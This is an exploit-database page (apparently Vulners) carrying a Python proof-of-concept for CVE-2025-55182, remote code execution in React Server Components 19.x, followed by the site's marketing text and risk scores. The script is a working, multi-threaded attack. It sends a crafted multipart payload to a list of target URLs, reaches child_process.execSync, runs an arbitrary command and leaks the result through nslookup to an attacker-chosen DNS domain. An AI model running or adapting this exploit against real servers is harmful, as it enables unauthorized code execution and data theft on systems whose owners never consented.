Vulners
Lucene search
React Server 19.2.0 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 462 |
|---|---|---|---|---|
 | Exploit for Deserialization of Untrusted Data in Facebook React | 31 Dec 202514:20 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 9 Dec 202506:46 | – | githubexploit |
| Exploit for CVE-2025-55182 | 4 Dec 202501:26 | – | githubexploit |
| Exploit for CVE-2025-55182 | 5 Dec 202517:47 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 7 Jan 202620:51 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 15 Dec 202514:56 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 6 Dec 202517:32 | – | githubexploit |
| Exploit for CVE-2025-55182 | 5 Dec 202508:40 | – | githubexploit |
| Exploit for CVE-2025-55182 | 4 Dec 202518:30 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 9 Dec 202503:48 | – | githubexploit |
10
# Exploit Title: React Server 19.2.0 - Remote Code Execution
# Date: 2025-12-05
# Exploit Author: [EynaExp] (https://github.com/EynaExp)
# Vendor Homepage: https://react.dev
# Software Link: https://react.dev/reference/rsc/server-components
# Version: [19.0.0, 19.1.0, 19.1.1, 19.2.0]
# Tested on: Windows,Linux
# CVE : CVE-2025-55182
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Color definitions
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
END = '\033[0m'
print("""
███████╗██╗ ██╗███╗ ██╗ █████╗ ███████╗██╗ ██╗██████╗
██╔════╝╚██╗ ██╔╝████╗ ██║██╔══██╗██╔════╝╚██╗██╔╝██╔══██╗
██║ ╚████╔╝ ██╔██╗ ██║███████║█████╗ ╚███╔╝ ██████╔╝
██║ ╚██╔╝ ██║╚██╗██║██╔══██║██╔══╝ ██╔██╗ ██╔═══╝
╚███████╗ ██║ ██║ ╚████║██║ ██║███████╗██╔╝ ██╗██║
╚══════╝ ╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝
CVE-2025-55182 Proof of Concept
by EynaExp
GitHub: https://github.com/EynaExp
""")
print(f"{Colors.RED}Disclaimer:\nThis tool is released for EDUCATIONAL and AUTHORIZED TESTING purposes only.\nThe author is not responsible for any misuse or damage caused by this program.{Colors.END}")
class NoUsageParser(argparse.ArgumentParser):
def error(self, message):
# completely suppress argparse usage
print(f"Error: {message}")
raise SystemExit(1)
parser = NoUsageParser(description="EynaExp Scanner")
parser.add_argument('-d', required=True)
parser.add_argument('-l', required=True)
parser.add_argument('-c', required=True)
print(f"{Colors.GREEN}\n[+]APP USAGE :\n[-d] <DNS(without http/s)>\n[-l] <Targets file path(url wordlist)>\n[-C] <Command>{Colors.END}\n")
args = parser.parse_args()
dns_endpoint = args.d.strip()
targets_file_path = args.l.strip()
CMD = args.c.strip()
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
"Next-Action": "x",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
}
request_body = (
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
"Content-Disposition: form-data; name=\"0\"\r\n\r\n"
"{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,"
"\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\","
"\"_response\":{\"_prefix\":\"process.mainModule.require('child_process').execSync('nslookup `"+CMD+"`."+dns_endpoint+"');\","
"\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n"
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
"Content-Disposition: form-data; name=\"1\"\r\n\r\n"
"\"$@0\"\r\n"
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n"
)
def send_request(target_url):
try:
response = requests.post(target_url, headers=headers, data=request_body, timeout=10, verify=False)
result_message = f"{Colors.GREEN}[+] {target_url} -> {response.status_code} ({len(response.content)} bytes){Colors.END}"
for header_key in ["x-action", "next-action", "rsc"]:
if header_key in response.headers:
result_message += f"\n{Colors.BLUE} header match: {header_key} = {response.headers.get(header_key)}{Colors.END}"
return result_message
except Exception as exception:
return f"{Colors.RED}[-] {target_url} -> error: {exception}{Colors.END}"
with open(targets_file_path) as file_handle:
target_urls = [line.strip() for line in file_handle if line.strip()]
print(f"{Colors.YELLOW}[*] Loaded {len(target_urls)} targets — starting multi-thread scan...{Colors.END}\n")
with ThreadPoolExecutor(max_workers=30) as executor:
futures = {executor.submit(send_request, url): url for url in target_urls}
for future in as_completed(futures):
print(future.result())Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2026 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.110
EPSS0.84489
SSVC